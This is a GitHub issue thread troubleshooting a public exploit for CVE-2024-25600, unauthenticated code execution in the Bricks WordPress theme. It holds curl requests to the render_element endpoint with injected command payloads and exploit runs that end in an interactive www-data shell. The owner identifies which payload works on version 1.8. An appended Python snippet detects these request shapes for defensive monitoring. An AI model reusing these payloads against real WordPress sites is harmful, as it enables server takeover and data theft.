Nonce obtained but not expected exploit response #1

Closed
NozoMizore7 opened this issue Feb 22, 2024 · 6 comments

Comments

@NozoMizore7

NozoMizore7 commented Feb 22, 2024

Wordpress Version 6.4.3
Bricks Version: 1.8

Just installed the Bricks theme, no further configuration.

python3 exploit.py -u http://172.16.101.169:8000/
url to fetch nonce: http://172.16.101.169:8000/
[*] Nonce found: 7985d3d59c
200 {"data":{"html":"<div class=\"brxe-7c8047 brxe-container\"><\/div>"}}
[-] http://172.16.101.169:8000/ is not vulnerable to CVE-2024-25600. No extracted_text

Same happened when I tried the curl:

curl -k -X POST http://172.16.101.169:8000/wp-json/bricks/v1/render_element -H "Content-Type: application/json" -d '{
  "postId": "1",
  "nonce": "7985d3d59c",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`whoami`);",
        "objectType": "post"
      }
    }
  }
}'
{"data":{"html":"<div class=\"brxe-f7e897 brxe-container\"><\/div>"}}
@NozoMizore7
Author

another strange thing is that the nonce obtained by requests.get or curl is the same, but it is different from the one I see on the webpage, and only the former nonce is valid; using the latter nonce returns 403:
{"code":"rest_cookie_invalid_nonce","message":"Cookie check failed","data":{"status":403}}

@Chocapikk
Owner

Hello, I've updated my code. In fact, from what I understand, the payload I used doesn't work on all versions because the feature wasn't implemented, but I don't really know since I don't have access to the version history.

I've made a lot of changes at 2f9dfea

Come back when you can and tell me if it's fixed :D.

In the end, there are still several payloads that are possible to trigger the RCE.

Regarding the nonce, it's very strange what you're saying. Are you sure you've chosen the right nonce in "nonce", which itself is in the "bricksData" variable in a script tag?

@NozoMizore7
Author

Checked your new version, still not workable.

python3 exploit.py -u http://172.16.101.169:8000/
url to fetch nonce: http://172.16.101.169:8000/
[*] Nonce found: 7985d3d59c
200 {"data":{"html":"<div id=\"brxe-e54455\" data-script-id=\"e54455\" class=\"brxe-carousel\"><div class=\"bricks-swiper-container\" data-script-args=\"{&quot;slidesPerView&quot;:2,&quot;slidesPerGroup&quot;:1,&quot;speed&quot;:300,&quot;autoHeight&quot;:false,&quot;effect&quot;:&quot;slide&quot;,&quot;spaceBetween&quot;:0,&quot;initialSlide&quot;:0,&quot;loop&quot;:false,&quot;centeredSlides&quot;:false}\"><div class=\"swiper-wrapper\"><div class=\"repeater-item swiper-slide\"><\/div><\/div><\/div><\/div>"}}
[-] http://172.16.101.169:8000/ is not vulnerable to CVE-2024-25600. No extracted_text
[-] No vulnerability found.
curl -k -X POST http://172.16.101.169:8000/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "7985d3d59c",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'
{"data":{"html":"<div id=\"brxe-313533\" data-script-id=\"313533\" class=\"brxe-carousel\"><div class=\"bricks-swiper-container\" data-script-args=\"{&quot;slidesPerView&quot;:2,&quot;slidesPerGroup&quot;:1,&quot;speed&quot;:300,&quot;autoHeight&quot;:false,&quot;effect&quot;:&quot;slide&quot;,&quot;spaceBetween&quot;:0,&quot;initialSlide&quot;:0,&quot;loop&quot;:false,&quot;centeredSlides&quot;:false}\"><div class=\"swiper-wrapper\"><div class=\"repeater-item swiper-slide\"><\/div><\/div><\/div><\/div>"}}

Regarding the nonce, as you see the valid nonce obtained by exploit.py is '7985d3d59c', but the same webpage in the browser shows '74a57b1080' instead (this one is invalid).
[Screenshot attached: 2024-02-21 23:14:57]

@Chocapikk
Owner

Well, regarding the nonce, I tried to reproduce what you told me and indeed I see the same behavior: the nonce is different depending on whether it is fetched by the browser or by curl. I don't know the cause, but to overcome this problem you can just retrieve the nonce from your curl request and then run the curl PoC. It will work. As for injecting PHP code on version 1.8, no idea why it's not working on your instance.

@Chocapikk
Owner

Hey,

Just took a deeper dive into the Bricks version 1.8 code and compared it with version 1.9.5 based on the issue you opened. Here's the gist of what I found:

It looks like in version 1.8, the eval() functionality isn't incorporated in prepare_query_vars_from_settings. However, the code element in Bricks was already accessible for code execution even back in 1.8. This makes the code payload work effectively, as it leverages an existing feature that wasn't specifically guarded against in earlier versions.

Here’s a quick recap on the payloads:

Working payload:

$ python exploit.py -u http://localhost:8888 --payload-type code
[*] Nonce found: de1e9b5b98
[+] http://localhost:8888 is vulnerable to CVE-2024-25600. Command output: www-data
[!] Shell is ready, please type your commands UwU
# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
#

This demonstrates that the code payload effectively exploits the vulnerability because the code element, present since version 1.8, allows for direct code execution.

Non-working payloads (everything except "code"):

$ python exploit.py -u http://localhost:8888 --payload-type container
[*] Nonce found: de1e9b5b98
[!] http://localhost:8888 is vulnerable to CVE-2024-25600 with successful auth bypass, but RCE was not achieved.
[!] Debug:
<div class="brxe-4e2abb brxe-container"></div><div class="brxe-5dd3e6 brxe-container"></div><div class="brxe-074779 brxe-container"></div><div class="brxe-3a15e2 brxe-container"></div><div class="brxe-4b613e brxe-container"></div><div class="brxe-c26a94 brxe-container"></div><div class="brxe-2007f5 brxe-container"></div><div class="brxe-c4d281 brxe-container"></div><div class="brxe-cbf0aa brxe-container"></div><div class="brxe-070714 brxe-container"></div>

Hope this clears up why the code payload works and the others don't as effectively. Then you can update the exploit and try again. Thanks for pointing this out!
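
For anyone monitoring a Bricks install while the fix is rolled out, the two vectors the thread settles on (the Code element rendered through the REST endpoint, and `useQueryEditor` in a render request) are easy to recognise at the request level. The check below is an added example written for this issue, not code from the PoC repository; the endpoint path and field names come from the requests shown above, the sample requests are constructed, and the exact settings a Code element carries are not assumed (it matches on the element name alone).

```python
import json

# Added example: flag requests to the Bricks render_element REST endpoint that carry
# the two unauthenticated code-execution vectors discussed in this issue:
#   * element name "code" (the Code element, present since Bricks 1.8)
#   * settings.query.useQueryEditor == true (the query editor path, eval() in later versions)
RENDER_ENDPOINT = "/wp-json/bricks/v1/render_element"


def _truthy(value):
    # The PoC sends booleans both as JSON true and as the string "true"; accept both.
    return value is True or (isinstance(value, str) and value.lower() == "true")


def classify_request(method: str, path: str, body: str) -> list:
    """Return the reasons a request looks like a CVE-2024-25600 attempt (empty list if none)."""
    reasons = []
    if method.upper() != "POST" or not path.split("?", 1)[0].endswith(RENDER_ENDPOINT):
        return reasons
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return ["render_element POST with non-JSON body"]
    element = data.get("element") if isinstance(data, dict) else None
    if not isinstance(element, dict):
        return reasons
    if element.get("name") == "code":
        reasons.append("code element rendered via REST (direct code execution)")
    settings = element.get("settings") or {}
    query = settings.get("query") if isinstance(settings, dict) else None
    if isinstance(query, dict) and _truthy(query.get("useQueryEditor")):
        reasons.append("useQueryEditor enabled in REST render request (query editor eval path)")
    return reasons


# Constructed sample traffic (not real logs): one benign request and the two attempt shapes.
# The queryEditor value is a placeholder; the detector does not inspect its contents.
SAMPLE_REQUESTS = [
    ("GET", "/wp-json/wp/v2/posts", ""),
    ("POST", RENDER_ENDPOINT, json.dumps({"postId": "1", "nonce": "x", "element": {
        "name": "container", "settings": {"hasLoop": "true", "query": {
            "useQueryEditor": True, "queryEditor": "<placeholder>", "objectType": "post"}}}})),
    ("POST", RENDER_ENDPOINT, json.dumps({"postId": "1", "nonce": "x",
                                          "element": {"name": "code", "settings": {}}})),
]


def scan(requests=SAMPLE_REQUESTS):
    """Return (path, reasons) for every request that triggers at least one reason."""
    hits = [(path, classify_request(m, path, body)) for m, path, body in requests]
    return [(path, reasons) for path, reasons in hits if reasons]
```

Blocking on these reasons at a WAF or reverse proxy is a stopgap; updating the theme remains the fix, and a valid nonce in the request does not make it safe, since the thread shows the nonce is readable from the public page.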

@NozoMizore7
Author

I tried the new payload and it does work on the 1.8 version. Thank you for your effort!

@Chocapikk Chocapikk pinned this issue Jul 9, 2024